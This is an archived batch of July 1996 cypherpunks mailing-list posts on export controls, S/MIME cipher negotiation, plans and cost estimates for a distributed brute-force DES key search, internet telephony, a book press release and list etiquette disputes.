Message-ID: <v03007807ae1ab2c8db0e@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:09 PM -0700 7/22/96, Ted Anderson wrote:
>shamrock@netcom.com (Lucky Green) writes:
>> At 15:27 7/20/96, Tom Weinstein wrote:
>> >Why not consider what the consequences will be?  Do you seriously
>> >believe that this will make the government stop enforcing ITAR?  Do you
>> >believe it will make them change the law?  No.  What it will do is make
>> >them remove our permission to distribute this stuff.
>>
>> I doubt that. PGP has been distributed for years with less safeguards
>> than Netscape. It is available on more free-world sites than Netscape
>> US. This did not prompt the powers that be to force MIT to take down
>> their site.
>> ...
>
>I must agree with Lucky.  I am quite sure that even if Netscape was not
>begin distributed over the net, copies would still be uploaded to
>international sites by folks practicing Civil disobedience.

To call simple lawbreaking by cowards working in secret "civil
disobedience" is to defame the name of Gandhi, King, and all the legitimate
protesters of modern history. Civil disobedience must be seen publicly, and
must be done by observable individuals. Masked men throwing stink bombs is
not civil disobedience--it's hooliganism.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Wed, 24 Jul 1996 02:41:25 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F4C7AB.18C6@netscape.com>
Message-ID: <Pine.SGI.3.93.3.960723092837.18152A-100000@asparagus.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 23 Jul 1996, Jeff Weinstein wrote:

>   I don't like the fact that your proposal ties the size of the
> bulk encryption key to the size of the public modulus.  There
> are legitimate reasons why someone might choose to have a 512
> bit modulus even though they prefer longer bulk encryption keys.
> Your heuristic would be a good fallback in the absence of more
> reliable information.  

   I agree. My proposal certainly has its limitations. In addition to the
one you cite, it will make it very difficult to change away from
Triple-DES when the time comes. 

   Of course, your hypothetical user who wants to use a 512-bit key and
128-bit RC2 is still completely screwed by all currently shipping S/MIME
products, as well as the S/MIME spec.

>   There is another method that does not require verisign or other
> CAs to add key size extensions to their certs.  We can define
> a new authenticated attribute that gets included in Signed-Data
> and Signed-And-Enveloped-Data messages that indicates the
> user's key size and algorithm preference.  This has the advantage
> that the preference is selected and signed by the user.  This
> method was discussed at the S/MIME meeting in January at the
> RSA Crypto conference.  I'm a bit surprised that it never
> got into the Implementation Guide.  I'll make sure that
> we bring it up on the smime list again.

   I don't like the fact that your proposal leaves clients with absolutely
no information about symmetric cipher choice until the first round of
signed messages has been exchanged. In this initial round, the protocol is
still dependent on the global default.

   I'm not surprised that it didn't make it to the implementation guide.
Most of the people involved in S/MIME do not have a strong background in
security and do not understand the importance of this issue. In addition,
I suspect that there is a lot of resistance based simply on the added
implementation costs.

   I have no evidence that the protocol weaknesses in S/MIME are being
deliberately encouraged by the NSA, but on the other hand, I have no
evidence that they're not. It would certainly be consistent with tactics
that the organization has been known to use. But on the other hand, "never
ascribe to malice..."

>   What we finally implement will probably be a combination of
> the three methods, with the user's selection taking precedence
> over the CAs selection, which takes precedence over the
> heuristic based on modulus size.

   This approach is fine. If that's what you implement, you have my
blessing.

Raph

P.S. Can we agree not to describe 128-bit RC2 as "strong crypto" until
it's been subject to more serious scrutiny? It's probably a great cypher,
but most cautious crypto-people would far rather place their trust in
Triple-DES.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jul 1996 04:55:12 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
Message-ID: <v02120d23ae1ab020406e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:19 7/22/96, Anonymous wrote:

>How about getting the CyberCafes to accept ecash?  Just pull out your
>Newton/HP48/PDA and point the IR beam at the cash register.  Now that's
>an ecash application I'd like to see!!

So would I. And one day we will. Though not not on the HP48.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jul 1996 04:54:35 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
Message-ID: <v02120d24ae1ab2b0da89@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:53 7/23/96, Timothy C. May wrote:

>Or several times that number of machines or time for machines with less
>crunch. Say, 100K Pentium-type machines for a month or two. How might this
>be gotten?
>
>A while back I proposed one approach: a brute force "screen saver" for
>Windows machines. Other platforms, maybe, but the most cost-effective thing
>to do is to go after the Windows market only.

A friend of mine actually wrote an RC4-40 cracking screen saver during the
initial RC4 crack. We finished the brute force so quickly that he never
released the software.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 24 Jul 1996 08:06:06 +0800
To: perry@piermont.com
Subject: Re: Distributed DES crack
In-Reply-To: <199607231331.JAA15803@jekyll.piermont.com>
Message-ID: <199607231412.KAA14573@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> 
> I'm not entirely sure. It is certainly bigger than the factorings that
> have been done, but on the other hand it is fairly easy to put
> together the experiment, and there are an awful lot of idle machines
> out there in the world. I have on several occassions been in
> possession of four or five hundred idle CPUs at night, and I am pretty
> sure that other people are in that position. The net has also grown
> quite dramatically in recent years, and reaching 100,000 reasonably
> high speed machines might not be so hard these days. At that point, it
> becomes a question of how fast one can get the DES cracker. A constant
> factor of two or three then makes a considerable difference in the
> outcome, as does the user friendlyness of the overall system.
> 
Here are my back-of-the-calculator numbers:

2^55 = 3.6 * 10^16 trial ecb operations (+key setup).
Best P-100 DES software implementation I can find can do 110000 ECBs/sec.
Key setup takes about twice as long as a single ECB.
Assuming amazingly fast key setup and careful ECB optimization
(precompute IP and FP, gray coded key enumeration with cached round results,
etc), MAYBE, somehow, you could do 100000 ECB/sec on "average" workstation
(average = 100mhz Pentium).

That's 11000 Pentium-100 years for half the DES keyspace.  

> > Personally, I'd rather someone finish up the Wiener ASIC to the point where
> > it could go out to fab, get some prototype chips made, design a board around
> > it, and publish the design, from board layout on down.  This would be a
> > great Master's project, and some of us (maybe me, but I'll have to check)
> > might even be able to scrape up enough funds to buy enough chips/boards/etc
> > to build a modest size machine (say, that could exhaust a DES key in 1-6
> > months).  Initial engineering costs aside, the marginal cost of each
> > such machine could be well within the budgets of, say, a medium size crypto
> > research lab, and would make a scary enough demo to convince even the
> > most trusting management types of the risks of 56 bit keys.
> 
> Well, that would certainly be cool, but this does require real
> money. If you are willing to spend it, go for it, but I'm not sure we
> can count on people doing that sort of thing. What do you suppose the
> odds are that someone is going to build such a thing any time soon?
> 

Well, I'm working on getting the funds to build (or support someone
to build) some kind of parallel DES engine.  I can probably scrape
together an FPGA-based machine that can do a key in less than 6 months.
I'm very serious about this project, but I can't say for sure when or if
I'll be ready to start.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jul 1996 04:23:36 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607231412.KAA14573@crypto.com>
Message-ID: <199607231419.KAA15900@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> Here are my back-of-the-calculator numbers:
[...]
> MAYBE, somehow, you could do 100000 ECB/sec on "average" workstation
> (average = 100mhz Pentium).
> 
> That's 11000 Pentium-100 years for half the DES keyspace.  

Hmmm...

Lets assume 20,000 P100 Years to give a bit more breathing
room. 100,000 machines would be needed to get the thing into striking
distance. I think that is potentially doable. Hard, but
doable. Managing to avoid search failure (that is, having someone find
the key but somehow fail to report back) is the biggest problem, I
think.

> Well, I'm working on getting the funds to build (or support someone
> to build) some kind of parallel DES engine.  I can probably scrape
> together an FPGA-based machine that can do a key in less than 6 months.
> I'm very serious about this project, but I can't say for sure when or if
> I'll be ready to start.

If you can manage to do that, then I'd say that the software only
approach could be abandoned. Meanwhile, I think its time to try to
build those DES cracking screensavers for Windows...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 18:42:41 +0800
To: cypherpunks@toad.com
Subject: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.)
Message-ID: <ae196a340e02100466af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 PM 7/22/96, hallam@Etna.ai.mit.edu wrote:

>No, the argument is over whether a person should live by the ideals he
>preaches. I have more respect fot the likes of Kant and Russell who made
>rather more of an effort than Jefferson.
>
>The observation that history is made by rich people and written by rich
>people is not a new one. Until this century there were few countries
>where politics were open to anyone but the very wealthy. In the USA
>that is still by and large the case.
>
>Rather than attempting to excuse Jefferson it would be better to
>accept that not everything he said was valid when he said it and
>to try to engage ones brain rather than using his words as slogans.

I agree with much of what Phill says here. His original "throwaway line"
about Jefferson's slave-owning did not fully make this point. (As I see it,
this is a common danger with throwaway lines, which often look like
dismissive insults.)

The flaws of leaders and thinkers are well-known. From from what I've read,
Voltaire was a real cad. And my favorite aphorist/philosopher, Nietzsche,
had his share of bigoted views. And he was apparently not at all a
"superman" specimen.

But who cares? The ideas of a person are somewhat separable from their
quirks as persons. If we demand perfection from all thinkers--assuming
perfection could ever be defined and agreed upon--we'd likely have far
fewer thinkers to study.

(Phill also mentions Rand. She was about as deeply flawed an individual,
especially in terms of treatment of her supporters, as one can imagine.
She, for example, insisted that her followers smoke, as smoking is (she
claimed) proof of Man's dominance over nature. However, many of her ideas
were very influential.)

I rather suspect the U.S. would have had a more consistent moral stance if
a condition for a state joining the Union had been the freeing of all
slaves. Of course, giving womyn the vote would have been too much to ask
for.

(And there were many violations of the rights of Indians, including
land-use rights and treaties, which did little to polish the reputation of
the U.S. for adhering to its own stated principles.)


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 24 Jul 1996 09:41:05 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Distributed DES crack
In-Reply-To: <Pine.SCO.3.93.960723093328.11859A-100000@grctechs.va.grci.com>
Message-ID: <199607231430.KAA14775@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 23 Jul 1996, Matt Blaze wrote:
> 
> <snip>
> > 
> > Personally, I'd rather someone finish up the Wiener ASIC to the point where
> > it could go out to fab, get some prototype chips made, design a board around
> > it, and publish the design, from board layout on down.  This would be a
> > great Master's project, and some of us (maybe me, but I'll have to check)
> > might even be able to scrape up enough funds to buy enough chips/boards/etc
> > to build a modest size machine (say, that could exhaust a DES key in 1-6
> > months).  Initial engineering costs aside, the marginal cost of each
> > such machine could be well within the budgets of, say, a medium size crypto
> > research lab, and would make a scary enough demo to convince even the
> > most trusting management types of the risks of 56 bit keys.
> > alerts me to an interesting topic.  Thanks.)
> 
> Matt, can you give us an idea of the cost of a "modest size machine" might
> be?  Is this something we can do with a C'punks bake sale or our we going
> to need corporate/academic support?  Also, if we do use the bake sale
> approach, is there some way the money can be collected and routed into an
> R&D sort of facility without causing a lot of stink with whomever actually
> runs the place, like a university?

My estimate is that an FPGA-based machine that can do a single DES key
every four months (eight months to exhaust the whole keyspace) could
be built with off-the-shelf stuff for comfortably under $50k (plus
labor, plus software development costs).  A prototype board should cost
under $1000 and will help prove the concept and get a more accurate cost
estimate.  I expect to build such a prototype machine myself, and, if it
works as I expect, maybe the whole thing.

-matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 24 Jul 1996 04:03:05 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Borders *are* transparent
In-Reply-To: <v03007803ae1a08ca5dc1@[207.67.246.99]>
Message-ID: <199607231437.KAA20409@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Marshall Clow writes:

: >"Peter Trei" <trei@process.com> wrote:
: >
: >   Any one up for a distributed brute force attack on single DES? My 
: >   back-of-the-envelope calculations and guesstimates put this on the
: >   hairy edge of doability (the critical factor is how many machines can
: >   be recruited - a non-trivial cash prize would help). 
: >
: I'll be there.
: I have a pair of PowerPC machines that I can donate for a week or so.

I am afraid that the number of machines needed would trivialize even
the most non-trivial cash prize.  But for what its worth, I can give
you a lot of spare cycles on a couple of 486 Linux boxes.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Wed, 24 Jul 1996 09:17:07 +0800
To: "Peter Trei" <trei@sybase.com>
Subject: Re: Brute Force DES
Message-ID: <9607231746.AA26532@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


How about harder logistical problem?

I had considered the possibility of cracking DES
once and for all (I was specifically thinking of
crypt(3), but it applies just as well for
DES in general..) and instead of trying up a bunch
of computers for however many months it took to crack 
a single key...  Let's tie up everyone's extra storage
and store the results as each key is generated..

Yes, I realize that it's a rather large amount of storage...

Then key lookups could be done at will, reverse DNS
style..

    Ryan

---------- Previous Message ----------
To: frissell, cypherpunks, trei
cc: 
From: trei @ process.com ("Peter Trei") @ smtp
Date: 07/22/96 04:55:17 PM
Subject: Re: Brute Force DES

> Peter wrote:
> >Any one up for a distributed brute force attack on single DES? My 
> >back-of-the-envelope calculations and guesstimates put this on the
> >hairy edge of doability (the critical factor is how many machines can
> >be recruited - a non-trivial cash prize would help). 

Duncan wrote: 
> I volunteer my 120 MHZ Pentium.  A lot more Pentiums are out there now than
> a year ago.  That makes it more feasible.  A lot more people with full net
> connections.  Like most Americans, I have a flat rate net connection and a
> flat rate local phone connection so could run a cracking session permanently
> (as long as no one tells my ISP).  We need a full test of the Winsock
> cracking client in any case.  It wasn't working very well last time.
> 
> DCF

<back-of-envelope>

In my terminology, 'hairy edge of doability" means we have a shot
at success, but I wouldn't bet the farm on it.

I thought that I might bet a couple hundred bucks, though.

Sadly, after further calculation, I'm not so sure if it's doable just yet.

What I'm looking at is a known plaintext attack on single ECB DES, 
using a brute-force test to cycle through the key space. People 
would get chunks of keyspace to test from a central server or 
servers, and would be motivated to take part by a cash prize for
the lucky person who finds the key.

Lets do  the numbers:

Single DES has the security of 56 bits of key - there are 64 bits in the
keys, but 8 of them are parity bits which add nothing to security.

2^56  = 7.205e16 keys (which is a whopping big number)

Let's guess that we can recruit the equivalent of full-time on 1000
machines.

7.205e13 keys/machine.

Let's guess that we have about a month before people start to lose 
interest - so we want to be more than 1/2 done by then. Lets say
we want to sweep the whole space in 40 days.

1.8e12 keys/machine/day 

~21,000,000 keys/machine/second

The fastest general purpose, freely available des implementation I'm
aware of is libdes. by Eric Young. With this, I can do a set_key in 
15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).

I'm looking at ideas to speed up DES - if I'm willing to use
honking great lookup tables, the permutation steps  can be done 
more quickly than libdes. I'm also looking at implementing the
algolrithm in hand-optimized P5 assembler.  (It's been years since
I've done a major assembler project - the P5 has some truely weird
features to be considered, but also has (some) internal 64 bit
registers to play with).

Let's guess that I can speed up a key-test up by a factor of 10. (This is
not a slur on Eric's code - it's extremely clever, but not optimized
for any particular processor, or for key-testing.  Note that the keytest 
described above takes about 10,000 cycles/test.)

That gets my workstation up to about 90,000 keys a second, which is
still almost a factor of 250 too slow. 

I'm going ahead with my work on a faster DES keytester, but unless
optimizing gives an astounding win, I now think a distributed bruting 
effort is a bit pre-mature.

What will make this brute doable, if not now, then in the near future?

1. Faster Processors - Moore's Law is still holding. A year ago, my
90 MHz Pentium was one of the faster machines taking part in the
40-bit RC4 crack. Now, it's passe.

2. More processors. The number of people on the internet continues
to grow rapidly.

3. More interest - Crypto awareness has greatly increased in the
last year, and a real cash prize (say, over $500) will generate both
publicity and interest.

These factors all multiply together. The number of cycles that could
probably be recruited is increasing at a fast rate. A major part of the
work will be a keyspace distribution mechanism which can handle
the load (this was a major stumbling block last year). 

</back-of-envelope>

Peter Trei
trei@process.com

Disclaimer: This has nothing to do with my employer.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: W Lee Nussbaum <wln@evolution.com>
Date: Wed, 24 Jul 1996 03:00:09 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Intel, Microsoft doing Internet Phone Software
In-Reply-To: <199607230542.WAA10169@mail.pacifier.com>
Message-ID: <Pine.SOL.3.91.960723104438.20239A-100000@darwin>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 22 Jul 1996, jim bell wrote:

> If these people REALLY wanted to promote the use of Internet telephoning, 
> what they'd do is implement a system where an Internet ISP could be "called" 
> over the Internet by a person wanting to place an LD telephone call to that 
> area, and (presumably using A/D and D/A techniques) rather than generating 
> and receiving modem tones, woudl generate and transmit the audio over the 
> telephone line.  That way, the target of the call would simply need to pick 
> up the telephone and talk, as he would ordinarily do:  He wouldn't even need 
> a computer.  He might not even know the call was going over the Internet.  

...see IDT's Net2Phone product, at http://www.net2phone.com/; it does 
what you describe.  Two notes: (1) I haven't used it yet; (2: disclosure) 
I'm now employed by IDT, though in a different area.

 - Lee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Wed, 24 Jul 1996 03:15:33 +0800
To: Rants@wired.com
Subject: Latest Schwartau Banned From Export
Message-ID: <199607231457.KAA27997@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release:                                                 


Contact:
Robert Newman (508) 478-0900
Jacqueline Jeng (212) 780-6133

(New York, NY):  The Internet had been called the world's largest Enterprise 
Zone -- a place where small business people and entrepreneurs can compete with 
corporate giants.  But to make it work, a business must master the ways of the 
Net -- how to target on-line customers, how to present products and services 
with style, and how to keep sites and transactions secure.

That's why  Winn Schwartau and Chris Goggans, internet experts with first hand 
knowledge of both the potential and dangers of the Internet, have created The 
Complete Internet Business Toolkit ($34.95, Van Nostrand Reinhold, ISBN 
0-42-02222-0) -- the first comprehensive manual for setting up, operating and 
defending a business in Cyberspace.

In The Complete Internet Business Toolkit, two of the digital age's savviest 
cybernauts offer all the information and tools needed to establish, maintain, 
expand and protect Net enterprises. This complete resources includes information
on common pitfalls, security measures, and payment methods needed to open up 
shop on the Internet.

>From the basics of how to get on line to the mechanisms needed to protect credit
card transactions and use Cybercash, Schwartau and Goggans provide businesses 
with a step by step approach to creating a secure, functional and user-friendly 
on-line business.  The Complete Internet Toolkit will:

* Outline how a business can easily expand by taking advantage 
 of the Internet and its myriad resources.
* Demonstrate how to design a web page that will capture the 
 attention of cyber-customers.
* Review all of the current major security software for conducting 
  financial transactions on the Internet.

The Complete Internet Toolkit also includes a bonus CD-ROM with more than 5,000 
files. In a matter of minutes, it can download Web browsers, SLIP/PPP drivers, 
digital cash and encryption programs, graphics and animation viewers, 
compression utilities, and other key programs for navigating the Internet. THE 
BOOK CONTAINS CRYPTOGRAPHY TOOLS BANNED OUTSIDE THE U.S.

Far from another dry, reference book, The Complete Internet BusinessToolkit is 
written in clear and entertaining style and is designed for the small business 
owner or the individual poised to overcome any challenge in order to stake out 
their claim in Cyberspace.


See reverse side for Table of Contents and About the Authors

ABOUT THE AUTHORS

One of the world's leading experts on information security and electronic 
privacy, Winn Schwartau is President of Interpact, Inc., an international 
security consulting firm for industry and government and is the author of 
Information Warfare: Chaos on the Electronic Superhighway and Terminal 
Compromise, as well as more than 500 articles.

Chris Goggans owns Computer Security Technologies, a consulting firm based in 
Austin, TX. A founding member of the legendary hacking group, the "Legion of 
Doom," Goggans has helped Federal authorities crack some of their most notorious
computer and telecommunications frauds such as the "Masters of Deception" case. 
Goggans is the editor of the on-line publication, Phrack Magazine.


TABLE OF CONTENTS

... A Brief History of Cyberspace
... Getting Wired
... Electronic Mail
... Usenet NewsGroups
... Telnet and FTP
... The World Wide Web
... HTML
... So You Want to Get Paid
... Other Useful Applications
... Defending Yourself on the Internet
... Your Future on the Internet
... Appendix A - What's on the CD-ROM

If you are interested in scheduling an interview 
or in receiving more information about the book,
please call Bob Newman at (508) 478-0900.

The Complete Internet Business Toolkit 
is available in better bookstores 
or by calling
1-800-842-3636.  



Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Wed, 24 Jul 1996 04:20:15 +0800
To: perry@piermont.com
Subject: Re: Brute Force DES
In-Reply-To: <199607231338.JAA15819@jekyll.piermont.com>
Message-ID: <31f4f77f1947002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger said:
> 
> "Peter Trei" writes:
> > The fastest general purpose, freely available des implementation I'm
> > aware of is libdes. by Eric Young. With this, I can do a set_key in 
> > 15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
> > about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).
> 
> I'll point out that like most DES implementations, Eric's tries to
> spend a lot of time in key setup to save time later on in
> encryption/decryption. This tradeoff would probably be very different
> if you didn't plan on trying more than one or two blocks of decryption
> after getting a key.
> 

For instance if you had a DES encrypted gzipped file. The first 2 bytes
plaintext will be Ox1f8b. You'd only have to try to fully decrypt 
1 out of 65535 keys.

-- 
Kevin L. Prigge                     | "I rarely saw people sitting at
Systems Software Programmer         |  computers producing real code
Internet Enterprise - OIT           |  wearing ties." - Philippe Kahn
University of Minnesota             | (speech at Software Development '90)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 24 Jul 1996 09:51:40 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Brute Force DES
In-Reply-To: <2.2.32.19960722180543.0069c5a8@panix.com>
Message-ID: <199607231821.LAA11416@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



I volunteer any unloaded P133 & P166 we have here.  We literally
have hundreds.  Unfortunately, they mostly run Winblows 95.  If
you can get me source ...  I can help.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 06:01:11 +0800
To: cypherpunks@toad.com
Subject: Re: DAM_lin
Message-ID: <199607231824.LAA11869@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:10 PM 7/23/96 GMT, John Young wrote:
>   7-23-96, WaPo: 
> 
>   "The Cryptography Wars." Op-Ed By Kenneth W. Dam and 
>   Herbert S. Lin 
>    Indeed, only a fully open 
>      and inclusive public discussion can lead to the national 
>      consensus upon which any successful cryptography policy 
>      will depend. 
>   http://jya.com/damlin.txt  (6 kb) 

I've pointed out (primarily to Sternlight) that the whole concept of 
referring to it as a "cryptography _policy_" biases the discussion.  
"Policies," in this usage, are the functions of governments.  Countries 
don't necessarily have any need to have a "policy" on cryptography.  In 
fact, one could argue that in a country where freedom of speech is in 
effect, no sort of restrictive "policy" has any place.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 05:53:01 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Bare fibers
Message-ID: <199607231824.LAA11873@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:19 PM 7/23/96 -0400, Rabid Wombat wrote:
 
>> It occurs to me that a bare fiber could actually be (randomly) hung across 
>> treetops, roofs, power lines, and various other structures, over a 
>> many-block distance in suburban areas.    Such a fiber wouldn't be 
protected 
>> very well, but it would probably last a few months.  It would also be 
>> exceedingly hard to find its terminations, and tracing it would be a real 
>> pain.  (It probably wouldn't be visible against a bright sky more than a 
>> meter or two away.)
>
>It also would have little structural integrity - if you attached it to
>trees, which sway in the wind, you'd have a broken fiber in a short time.
>(The fiber doesn't even need to break, per se; microscopic cracking,
>usually at the cladding, will ruin your fiber) (bird strikes would also be
>a big problem, mostly for the bird)

But how long?  I don't doubt that the effects you describe will occur, but 
I'm only talking about a _semi_-permanent installation.  My guesstimate 
(months) was based on the idea that the fiber would be short (say, less than 
a kilometer)enough so that even accelerated loss (microcracking) wouldn't 
appreciably degrade the transmission.  Also, I'm assuming that the fiber 
would be hung with enough slack so that swaying/growing trees wouldn't 
stretch the fiber appreciably.

>ob crypto/privacy: Anybody have a good idea for detecting a tap on 
>exterior fiber? I'd expect an attacker to have to interupt connectivity, 
>terminate both ends of a break, and insert an active device. Thoughts?

They can tap a fiber by bending it over a small radius, which causes leakage 
around the OD without appreciably interrupting the signal.  Changes are 
pretty good that this would b
e the technology used.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 24 Jul 1996 06:47:18 +0800
To: perry@piermont.com
Subject: Re: take the pledge
In-Reply-To: <199607191606.MAA04690@jekyll.piermont.com>
Message-ID: <199607231834.LAA11518@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> Look, folks, we all know that 99% of what David Sternlight posts is
> garbage. Why don't we all pledge not to answer any of his posts, and
> then he'll go away. If necessary, someone can be appointed to post a
> weekly "the views expressed by David are junk and we are deliberately
> not replying to them directly" message.
>
> David has plenty of places to argue with the wind. We don't need to
> add this one.
>
> I'd like to ask people to publically pledge that they will not reply
> to David's messages. This is such a pledge.

One of the desirable results of free speech is that people get to
listen to ideas rather than credentials.  Some poor Joe from the
ghetos has just as much freedom to speak because he may have good
ideas.  Given that, ignoring someone is much worse than to
listening with reservations.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Wed, 24 Jul 1996 06:43:21 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Distributed DES crack
Message-ID: <2.2.32.19960723183652.006a6520@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>I've a few machines around that could be dedicated almost full time to the
>task. What are the bandwidth requirements? Specifically, could the
>keycracker be run over a 28.8 (with a 486 running linux)?  If so, how many
>486's could I get over a single 28.8 (i.e. 28.8 -> multiple 486's daisy
>chained with ppp over direct serial connection)?

I imagine it would only need to report in every now and then with reports
on the work it's accomplished, thus requiring very minimal bandwidth (unless
you're the server, which would probably also do fine over 28.8).  For that
reason, you can have as many 486's as you can possibly own networked and
cracking at the same time... 

For the record, I'm in, and have access to several mostly idle pentiums and
a few sparc 10's ... =)

//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 24 Jul 1996 11:07:43 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-daw
In-Reply-To: <TCPSMTP.16.7.23.5.59.22.2645935021.655067@.nworks.com>
Message-ID: <24ZiRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


pjn@nworks.com writes:
>  > Please do not respond to anything "Dr." David Sternlight posts to this
>  > mailing list, no matter what nonsense he says. The asshole is starved
>  > for attension. He's just trolling for flames. Please ignore him. Thank
>  > you. 
> 
>   Get real... I dont like him or his posts, but he has the right to do 
>   so, and you have no right to censor him or anyone else.  If you dont
>   want to read his posts, then dont...Its that simple...
> 
>   For a mailing list that has so many people complaining about the
>   government censoring people...

The asshole has the right to spam this mailing listand to troll for flames;
others have the right to reply to him; I have the right to ask them not to.
That's freedom.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Tue, 23 Jul 1996 22:53:17 +0800
To: cypherpunks@toad.com
Subject: Re: Another fascist
In-Reply-To: <v03007807ae1a03b2bb71@[192.187.162.15]>
Message-ID: <Pine.GSO.3.95.960723113625.25697B-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 22 Jul 1996, David Sternlight wrote:

> One of the great friends of free speech on this list sent a forged cancel
> message to the listbot to try to cancel my subscription.

Surprise, surprise.

> What a piece of slime! What do others think of this practice?

I think it had to happen sometime :-)

Later
Mike

-----

I'm sure we will find out in a few years that Microsoft invented the
Net.  Or brought it to the masses.  Or saved it from a certain and
early demise.  Or all of the above.
     James Seymour







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jul 1996 11:28:34 +0800
